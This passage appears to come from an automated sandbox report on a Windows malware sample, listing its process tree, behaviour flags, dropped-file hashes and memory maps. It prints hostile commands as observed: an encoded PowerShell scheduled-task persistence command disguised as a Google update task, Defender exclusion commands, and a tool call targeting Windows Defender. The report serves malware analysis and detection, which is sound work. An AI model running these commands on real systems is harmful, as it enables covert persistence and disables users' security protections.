C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAaABuAGgAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAIgBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAIgAnACkAIAA8ACMAcABlACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABMAG8AZwBPAG4AKQAgADwAIwBhAHQAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwBnAHoAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAHQAeABkACMAPgA7AA=="4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\W194.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\W194.exe"3⤵
- UAC bypass
- Windows security bypass
- Executes dropped EXE
- Checks computer location settings
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension "exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\RarSFX0\W194.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\W194.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\W194.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\RarSFX0\W194.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\1547eed8-16e3-4e9a-8b50-91ebc91be6a1.exe"C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\1547eed8-16e3-4e9a-8b50-91ebc91be6a1.exe" /o /c "Windows-Defender" /r4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAaABuAGgAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAIgBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAIgAnACkAIAA8ACMAcABlACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABMAG8AZwBPAG4AKQAgADwAIwBhAHQAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwBnAHoAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAHQAeABkACMAPgA7AA=="2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Adobe\Telemetry\sihost64.exe"C:\Users\Admin\AppData\Roaming\Adobe\Telemetry\sihost64.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
-
C:\Windows\explorer.exeC:\Windows\explorer.exe lfbwpqcwkzzu0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeVB3K3IQ9adeOlWsGypRCxSKlOloRISgwtn7vaWwIHHTGEKUdZ9P1Zb/Nmecds8k6lS5X6xDnIsSE6kPSbJ1MGq7bkIO7FdiIBBLef6SB5Tgp/gvgU2Oa4T0mj+1Id8HXv6QEaW4r6FKvMyXAfcIbz3ZkCuWCqmcQcoOGsbHtIzuc9I8Pa4H+kyJHZawm+wn/QItPnZAEnIM7pRwp+QORP7RUnAkNzLrFVKYyapWTIDEJh5C8LrLV/LD8h2YJLV+RS7IH1f44JUspfdhYqZT9bmamoxcT6RqW6GBEO8WWZa0XrDLIIj9SuXH72mm4RdN3E+nPlw0u8ibD20XUUreihvER5cYqKj4CgK0X+Pj5hjI5a4zI5624oAF4KR2j5+p8kqg4AYjjP6IKvPr84I70fW2O/DVA+hV8rKdSrwTeEsrzW6/eM+AELBVYXEPrmSVi2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\test.bat"1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5fee026663fcb662152188784794028ee
SHA13c02a26a9cb16648fad85c6477b68ced3cb0cb45
SHA256dbd4136bc342e3e92902ec3a30d165452c82997a7ae24ac90775e42d88959e6b
SHA5127b12bd5c8fc4356b9123d6586b4980cf76012663b41c0dab6f6f21567e2f4005c5bcea2cc2158d157e4f801a281f3e04bad3774cddb3122db309ccf662184bd6
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\W194.exe.logFilesize
520B
MD541c37de2b4598f7759f865817dba5f80
SHA1884ccf344bc2dd409425dc5ace0fd909a5f8cce4
SHA256427235491a8da3fc8770ed60d30af731835c94585cd08d4d81fca9f703b283bc
SHA512a8f3c74916623de100e4cf22e05df9cdf541b1e32443aab0434f35fb9c4a7fa950b997ce589b532e65731ae471a1f152cd5c00ea1df4bd7a6b57eb27c93c54bd
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\48VMALJK\W194.exeFilesize
10.6MB
MD5ae63b9a4534477065720523df6733d67
SHA1b519abcf8788956041b6f911fa5d5a5154358ad5
SHA2561334edfe57dcbe8d6d4c5b951bbe04e5af45cd203dddc446a5bf241e09041900
SHA5124ba41773b50459e6924a16bba8fbf48dbdad72fcb4a362fb8c8c49279221165287e2a6f61f2b55a5cabc009c24fae2b1d8b2fde6f7fec7080a2564418c1baf13
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\48VMALJK\W194.exe.12wamlz.partialFilesize
10.6MB
MD5ae63b9a4534477065720523df6733d67
SHA1b519abcf8788956041b6f911fa5d5a5154358ad5
SHA2561334edfe57dcbe8d6d4c5b951bbe04e5af45cd203dddc446a5bf241e09041900
SHA5124ba41773b50459e6924a16bba8fbf48dbdad72fcb4a362fb8c8c49279221165287e2a6f61f2b55a5cabc009c24fae2b1d8b2fde6f7fec7080a2564418c1baf13
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b07006e57b8aec31047596deb0dd0883
SHA134f0cb0205478c43560e3aa59808318b7189b938
SHA256fd43235729e0374afdc358a5f9d55d344ee094dd09f0d7db0e73cf7bdf99345c
SHA5120619dd0eb492405257071cafd6c4cc1dd60a1250f49b255fc88cf64a6c5f87533f709b9c3b4b1fa1b9a2b38ff3071a32a608c34c35c7d9b5e9bb5e5ee5002bf0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD52ac3c9ba89b8c2ef19c601ecebb82157
SHA1a239a4b11438c00e5ff89ebd4a804ede6a01935b
SHA2563c2714ce07f8c04b3f8222dfe50d8ae08f548b0e6e79fe33d08bf6f4c2e5143e
SHA512b1221d29e747b37071761b2509e9109b522cce6411f73f27c9428ac332d26b9f413ae6b8c0aeac1afb7fab2d0b3b1c4af189da12fe506287596df2ef8f083432
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD5f23bd990b4ae9e9e951280e61c3ac6fb
SHA17bf01f4473e5b5b1ff469016838b622b07ef7691
SHA256f17ad9f8f56325634c3c56ceb4495f881f67ad9c994dbbf62ba324732826672e
SHA51291f75ee178b91dfd4d8c7d0b5feff73a144a0f39baf477cf5da3e178ea3e574abd249c85cd979c78920382b95cd20549e46b2c4078afd1859a287f62c2733701
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD52b950be7ca8339ce2658a6138bcac504
SHA119e65c32da02964210cff0c996a8bcf882126e04
SHA256dd55e35c4da0f022023399b2f890a39f46c3fef36335c1588a60e4c34bfb3e48
SHA51237615c95700d5db752ddf5b89ae05c07f8e16e809982173af7046740d76af2274e65abd9813304418d409cc2118fd0e336f6c859145c8499f98531b31b6d7cd9
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exeFilesize
10.3MB
MD5c7b61d7e08a2ce0e54c5018e483b7825
SHA112a5e2d06644bef56f87ed7df2c9efcdee379e58
SHA256f2ea8dbc8434b46125aaaf78fb5361a3967198851265a41084d3dbc264d52a03
SHA51227ce39f329152acc17f0545a9debffef60f75e2051c90bc88d8b0c4b19ab5437e933a80a5270102a308863f1563fed99b21eb332cac909f61b26e5414c9b66c4
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exeFilesize
10.3MB
MD5c7b61d7e08a2ce0e54c5018e483b7825
SHA112a5e2d06644bef56f87ed7df2c9efcdee379e58
SHA256f2ea8dbc8434b46125aaaf78fb5361a3967198851265a41084d3dbc264d52a03
SHA51227ce39f329152acc17f0545a9debffef60f75e2051c90bc88d8b0c4b19ab5437e933a80a5270102a308863f1563fed99b21eb332cac909f61b26e5414c9b66c4
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\W194.exeFilesize
406KB
MD54959db4b11ef1140006d9bb643bd1328
SHA10702d5561c71cee3cd62d535a54b11209d5812c1
SHA2569306329f22a227e4576a72b55d24467ba3447f8c9c41299e7b5679696d4ff7e2
SHA51260dc958f0282435ff408e4e6016481339957bef569419e186960b1141daef2cf676dc578c614101abf1b6042038a1c8d58e688ef7c6e0b8415683cf8bfa9831f
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\W194.exeFilesize
406KB
MD54959db4b11ef1140006d9bb643bd1328
SHA10702d5561c71cee3cd62d535a54b11209d5812c1
SHA2569306329f22a227e4576a72b55d24467ba3447f8c9c41299e7b5679696d4ff7e2
SHA51260dc958f0282435ff408e4e6016481339957bef569419e186960b1141daef2cf676dc578c614101abf1b6042038a1c8d58e688ef7c6e0b8415683cf8bfa9831f
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\W194.exeFilesize
406KB
MD54959db4b11ef1140006d9bb643bd1328
SHA10702d5561c71cee3cd62d535a54b11209d5812c1
SHA2569306329f22a227e4576a72b55d24467ba3447f8c9c41299e7b5679696d4ff7e2
SHA51260dc958f0282435ff408e4e6016481339957bef569419e186960b1141daef2cf676dc578c614101abf1b6042038a1c8d58e688ef7c6e0b8415683cf8bfa9831f
-
C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\1547eed8-16e3-4e9a-8b50-91ebc91be6a1.exeFilesize
25KB
MD55951b52c9b4d11ca7f4f33e5a3fb2c31
SHA10bc54fd699fff7b93e5c447a141c0d904924ab0d
SHA25670b785e5cb5b2e61c0f5da4a71ab0bbd14d9a0849387f037e0d75cc1ffe0a082
SHA51230b3b1eed05ba724d9a19d0d301b6ffb45222a47cc5476cc7f61ae565ddea4deea669f6fc3f38a1c5f24396eb4d3d6a7a8b58992fdfe2fac57dbcc2fa5b9b1d8
-
C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\1547eed8-16e3-4e9a-8b50-91ebc91be6a1.exeFilesize
25KB
MD55951b52c9b4d11ca7f4f33e5a3fb2c31
SHA10bc54fd699fff7b93e5c447a141c0d904924ab0d
SHA25670b785e5cb5b2e61c0f5da4a71ab0bbd14d9a0849387f037e0d75cc1ffe0a082
SHA51230b3b1eed05ba724d9a19d0d301b6ffb45222a47cc5476cc7f61ae565ddea4deea669f6fc3f38a1c5f24396eb4d3d6a7a8b58992fdfe2fac57dbcc2fa5b9b1d8
-
C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\AdvancedRun.exeFilesize
88KB
MD517fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\AdvancedRun.exeFilesize
88KB
MD517fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\test.batFilesize
17B
MD53276ac7dd29853e29046e0ffc4dd3b09
SHA12d14ed71932b60a3f3eebadf1c092cb7633c3fdf
SHA25666304c3a46bcc4e191d40db4ed6b6f3c25049a730a63af205485979f430e445a
SHA51273e3c85c9aaacacdee433beb1e8503df9f3df227c8d567cf851549c9735592dfca059a042745d33d709797e71c2c97a0d509dbf9334ba81a1382b82ab2d36bde
-
C:\Users\Admin\AppData\Roaming\Adobe\Telemetry\sihost64.exeFilesize
2.6MB
MD5d81aa58c06222d5f5e8cb8d240bbb7ba
SHA1e42c7660cc36a6f574a0af27bb04653dea8adfcd
SHA25663e2bbf99b809a80c009303d077596cb33a8f7f7e0419bf0b5fa21958943a310
SHA512f5c0de7a8fa5cfb55d29a7621c93fc813567c0b1b177b22f38fc8b19bc29fecfa9c0c74c6dc52183a0b1888c266d54efd884e490c335161fb47c7c643905baa7
-
C:\Users\Admin\AppData\Roaming\Adobe\Telemetry\sihost64.exeFilesize
2.6MB
MD5d81aa58c06222d5f5e8cb8d240bbb7ba
SHA1e42c7660cc36a6f574a0af27bb04653dea8adfcd
SHA25663e2bbf99b809a80c009303d077596cb33a8f7f7e0419bf0b5fa21958943a310
SHA512f5c0de7a8fa5cfb55d29a7621c93fc813567c0b1b177b22f38fc8b19bc29fecfa9c0c74c6dc52183a0b1888c266d54efd884e490c335161fb47c7c643905baa7
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeFilesize
10.3MB
MD5c7b61d7e08a2ce0e54c5018e483b7825
SHA112a5e2d06644bef56f87ed7df2c9efcdee379e58
SHA256f2ea8dbc8434b46125aaaf78fb5361a3967198851265a41084d3dbc264d52a03
SHA51227ce39f329152acc17f0545a9debffef60f75e2051c90bc88d8b0c4b19ab5437e933a80a5270102a308863f1563fed99b21eb332cac909f61b26e5414c9b66c4
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeFilesize
10.3MB
MD5c7b61d7e08a2ce0e54c5018e483b7825
SHA112a5e2d06644bef56f87ed7df2c9efcdee379e58
SHA256f2ea8dbc8434b46125aaaf78fb5361a3967198851265a41084d3dbc264d52a03
SHA51227ce39f329152acc17f0545a9debffef60f75e2051c90bc88d8b0c4b19ab5437e933a80a5270102a308863f1563fed99b21eb332cac909f61b26e5414c9b66c4
-
\Users\Admin\AppData\Roaming\FBFA.tmpMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/632-184-0x0000000000000000-mapping.dmp
-
memory/660-148-0x0000000000000000-mapping.dmp
-
memory/1404-201-0x0000000005810000-0x0000000005876000-memory.dmpFilesize
408KB
-
memory/1404-218-0x0000000007430000-0x00000000074C6000-memory.dmpFilesize
600KB
-
memory/1404-211-0x0000000067C40000-0x0000000067C8C000-memory.dmpFilesize
304KB
-
memory/1404-200-0x0000000004DE0000-0x0000000004E02000-memory.dmpFilesize
136KB
-
memory/1404-213-0x0000000006450000-0x000000000646E000-memory.dmpFilesize
120KB
-
memory/1404-192-0x0000000000000000-mapping.dmp
-
memory/1404-203-0x0000000005880000-0x00000000058E6000-memory.dmpFilesize
408KB
-
memory/1404-209-0x0000000005EA0000-0x0000000005EBE000-memory.dmpFilesize
120KB
-
memory/1404-215-0x00000000077F0000-0x0000000007E6A000-memory.dmpFilesize
6.5MB
-
memory/1404-217-0x0000000007220000-0x000000000722A000-memory.dmpFilesize
40KB
-
memory/1460-214-0x0000000067C40000-0x0000000067C8C000-memory.dmpFilesize
304KB
-
memory/1460-224-0x0000000007650000-0x000000000766A000-memory.dmpFilesize
104KB
-
memory/1460-225-0x0000000007630000-0x0000000007638000-memory.dmpFilesize
32KB
-
memory/1460-190-0x0000000000000000-mapping.dmp
-
memory/1460-222-0x0000000007540000-0x000000000754E000-memory.dmpFilesize
56KB
-
memory/2032-145-0x00007FFE34550000-0x00007FFE35011000-memory.dmpFilesize
10.8MB
-
memory/2032-144-0x000001AD35230000-0x000001AD35252000-memory.dmpFilesize
136KB
-
memory/2032-146-0x00007FFE34550000-0x00007FFE35011000-memory.dmpFilesize
10.8MB
-
memory/2032-142-0x0000000000000000-mapping.dmp
-
memory/2088-187-0x0000000000000000-mapping.dmp
-
memory/2088-212-0x0000000067C40000-0x0000000067C8C000-memory.dmpFilesize
304KB
-
memory/2088-193-0x00000000021D0000-0x0000000002206000-memory.dmpFilesize
216KB
-
memory/2088-195-0x0000000004E40000-0x0000000005468000-memory.dmpFilesize
6.2MB
-
memory/2088-216-0x0000000006E00000-0x0000000006E1A000-memory.dmpFilesize
104KB
-
memory/2088-210-0x00000000060A0000-0x00000000060D2000-memory.dmpFilesize
200KB
-
memory/2096-157-0x00007FFE54AF0000-0x00007FFE54CE5000-memory.dmpFilesize
2.0MB
-
memory/2096-143-0x00007FFE34550000-0x00007FFE35011000-memory.dmpFilesize
10.8MB
-
memory/2096-159-0x00007FFE34550000-0x00007FFE35011000-memory.dmpFilesize
10.8MB
-
memory/2096-156-0x0000000000460000-0x00000000010A2000-memory.dmpFilesize
12.3MB
-
memory/2096-141-0x0000000000460000-0x00000000010A2000-memory.dmpFilesize
12.3MB
-
memory/2096-140-0x0000000000460000-0x00000000010A2000-memory.dmpFilesize
12.3MB
-
memory/2096-135-0x0000000000000000-mapping.dmp
-
memory/2096-138-0x0000000000460000-0x00000000010A2000-memory.dmpFilesize
12.3MB
-
memory/2096-139-0x00007FFE54AF0000-0x00007FFE54CE5000-memory.dmpFilesize
2.0MB
-
memory/2984-236-0x0000000006060000-0x00000000060D6000-memory.dmpFilesize
472KB
-
memory/2984-227-0x0000000006DE0000-0x000000000730C000-memory.dmpFilesize
5.2MB
-
memory/2984-226-0x00000000066E0000-0x00000000068A2000-memory.dmpFilesize
1.8MB
-
memory/2984-238-0x0000000006030000-0x000000000604E000-memory.dmpFilesize
120KB
-
memory/2984-208-0x0000000004D20000-0x0000000004D5C000-memory.dmpFilesize
240KB
-
memory/2984-223-0x0000000005C30000-0x0000000005CC2000-memory.dmpFilesize
584KB
-
memory/2984-205-0x0000000004CC0000-0x0000000004CD2000-memory.dmpFilesize
72KB
-
memory/2984-204-0x0000000005260000-0x0000000005878000-memory.dmpFilesize
6.1MB
-
memory/2984-197-0x0000000000400000-0x000000000041C000-memory.dmpFilesize
112KB
-
memory/2984-206-0x0000000004DF0000-0x0000000004EFA000-memory.dmpFilesize
1.0MB
-
memory/2984-196-0x0000000000000000-mapping.dmp
-
memory/3252-154-0x0000000000720000-0x0000000001362000-memory.dmpFilesize
12.3MB
-
memory/3252-233-0x00007FFE34550000-0x00007FFE35011000-memory.dmpFilesize
10.8MB
-
memory/3252-232-0x00007FFE54AF0000-0x00007FFE54CE5000-memory.dmpFilesize
2.0MB
-
memory/3252-231-0x0000000000720000-0x0000000001362000-memory.dmpFilesize
12.3MB
-
memory/3252-172-0x0000000180000000-0x0000000180023000-memory.dmpFilesize
140KB
-
memory/3252-170-0x0000000003E60000-0x0000000003E72000-memory.dmpFilesize
72KB
-
memory/3252-155-0x0000000000720000-0x0000000001362000-memory.dmpFilesize
12.3MB
-
memory/3252-221-0x00007FFE34550000-0x00007FFE35011000-memory.dmpFilesize
10.8MB
-
memory/3252-153-0x00007FFE34550000-0x00007FFE35011000-memory.dmpFilesize
10.8MB
-
memory/3252-152-0x00007FFE54AF0000-0x00007FFE54CE5000-memory.dmpFilesize
2.0MB
-
memory/3252-151-0x0000000000720000-0x0000000001362000-memory.dmpFilesize
12.3MB
-
memory/3252-219-0x0000000000720000-0x0000000001362000-memory.dmpFilesize
12.3MB
-
memory/3252-220-0x00007FFE54AF0000-0x00007FFE54CE5000-memory.dmpFilesize
2.0MB
-
memory/3420-194-0x0000000000000000-mapping.dmp
-
memory/3592-179-0x00007FF690A4E000-mapping.dmp
-
memory/3592-239-0x00007FF68F900000-0x00007FF690A6F000-memory.dmpFilesize
17.4MB
-
memory/3592-180-0x00007FF68F900000-0x00007FF690A6F000-memory.dmpFilesize
17.4MB
-
memory/3592-234-0x0000000003AB0000-0x0000000003AD0000-memory.dmpFilesize
128KB
-
memory/3612-199-0x00007FFE34550000-0x00007FFE35011000-memory.dmpFilesize
10.8MB
-
memory/3612-191-0x0000020F1E440000-0x0000020F1E44C000-memory.dmpFilesize
48KB
-
memory/3612-202-0x00007FFE34550000-0x00007FFE35011000-memory.dmpFilesize
10.8MB
-
memory/3612-182-0x0000000000000000-mapping.dmp
-
memory/3796-147-0x0000000000000000-mapping.dmp
-
memory/4236-133-0x0000000000000000-mapping.dmp
-
memory/4640-160-0x0000000000000000-mapping.dmp
-
memory/4640-164-0x00000000005F0000-0x000000000065C000-memory.dmpFilesize
432KB
-
memory/4640-181-0x00000000083C0000-0x0000000008964000-memory.dmpFilesize
5.6MB
-
memory/4784-167-0x00007FFE34550000-0x00007FFE35011000-memory.dmpFilesize
10.8MB
-
memory/4784-166-0x00007FFE34550000-0x00007FFE35011000-memory.dmpFilesize
10.8MB
-
memory/4784-158-0x0000000000000000-mapping.dmp
-
memory/5056-168-0x0000000000000000-mapping.dmp
-
memory/5056-237-0x00007FF67F710000-0x00007FF67F9B0000-memory.dmpFilesize
2.6MB
-
memory/5056-240-0x00007FFE54AF0000-0x00007FFE54CE5000-memory.dmpFilesize
2.0MB
-
memory/5056-241-0x00007FF67F710000-0x00007FF67F9B0000-memory.dmpFilesize
2.6MB
-
memory/5056-242-0x00007FF67F710000-0x00007FF67F9B0000-memory.dmpFilesize
2.6MB
-
memory/5056-171-0x00007FF67F710000-0x00007FF67F9B0000-memory.dmpFilesize
2.6MB